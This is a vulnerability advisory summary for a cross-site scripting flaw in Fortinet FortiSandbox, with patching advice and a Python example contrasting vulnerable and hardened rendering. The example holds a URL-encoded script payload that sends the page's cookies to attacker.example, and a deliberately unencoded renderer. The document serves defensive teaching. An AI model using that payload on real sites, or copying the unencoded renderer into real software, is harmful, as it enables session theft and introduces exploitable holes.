EXECUTIVE SUMMARY:
Fortinet FortiSandbox contains a high-severity cross-site scripting (XSS) vulnerability, tracked as CVE-2025-52436, caused by improper neutralization of user-supplied input when the GUI generates web pages. An unauthenticated attacker can craft HTTP requests that inject script into the web interface; when an administrator or other privileged user opens the tainted page, the injected script runs in that user's browser under the user's authenticated GUI session. XSS does not by itself give the attacker command execution on the appliance; the impact is whatever the victim's session can do in the GUI, which can include performing administrative actions as that user, stealing session material, and thereby opening the way to unauthorized access, data exfiltration, lateral movement, and tampering with sandboxing protections. Until a fixed version is installed, restricting GUI access through network segmentation and access controls reduces exposure. The vulnerability has a CVSS score of 7.9.
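The flaw class described above (CWE-79, attacker input reflected into a GUI page without encoding) is illustrated below in a small added example. This is generic illustration code written for this note, not FortiSandbox code, and the host name, the "q" parameter and the payload are constructed placeholders that say nothing about the real affected endpoint. It shows the vulnerable pattern beside the hardened one (context-aware output encoding plus a Content-Security-Policy as defence in depth).

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed sample: the kind of crafted link an attacker would get an
# administrator to open. Host and parameter name are placeholders only.
CRAFTED_URL = (
    "https://sandbox.example.internal/search?q="
    "%3Cscript%3Edocument.location%3D%27https%3A%2F%2Fattacker.example%2F"
    "%3Fc%3D%27%2Bdocument.cookie%3C%2Fscript%3E"
)


def query_param(url: str, name: str) -> str:
    """Return the first value of a query parameter, percent-decoded."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_vulnerable(search_term: str) -> str:
    # Reflects attacker-controlled input straight into HTML with no encoding.
    # The browser of whoever views this page executes the injected <script>.
    return f"<h1>Results for: {search_term}</h1>"


def render_hardened(search_term: str) -> str:
    # Context-aware output encoding: the term can only ever appear as text
    # inside the element body, never as markup or attribute content.
    return f"<h1>Results for: {html.escape(search_term, quote=True)}</h1>"


def hardened_headers() -> dict:
    # Defence in depth: even if an encoding gap remains somewhere in the GUI,
    # a CSP without 'unsafe-inline' stops reflected inline script from running.
    return {
        "Content-Security-Policy": (
            "default-src 'self'; script-src 'self'; object-src 'none'; "
            "base-uri 'none'; frame-ancestors 'none'"
        ),
        "X-Content-Type-Options": "nosniff",
    }


def demo() -> dict:
    """Render the constructed payload both ways so the difference is visible."""
    term = query_param(CRAFTED_URL, "q")
    return {
        "decoded_payload": term,
        "vulnerable": render_vulnerable(term),
        "hardened": render_hardened(term),
    }


if __name__ == "__main__":
    for label, value in demo().items():
        print(f"{label}:\n  {value}")
```

The hardened renderer neutralizes the payload without rejecting it: an administrator searching for a literal angle bracket still gets a working page, which is why output encoding at the point of rendering is preferred over input blacklists.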
RECOMMENDATION:
We strongly recommend that you update FortiSandbox to a fixed version as listed in the Fortinet PSIRT advisory:
https://fortiguard.fortinet.com/psirt/FG-IR-25-093
REFERENCES:
The following reports contain further technical details:
https://cybersecuritynews.com/fortisandbox-xss-vulnerability/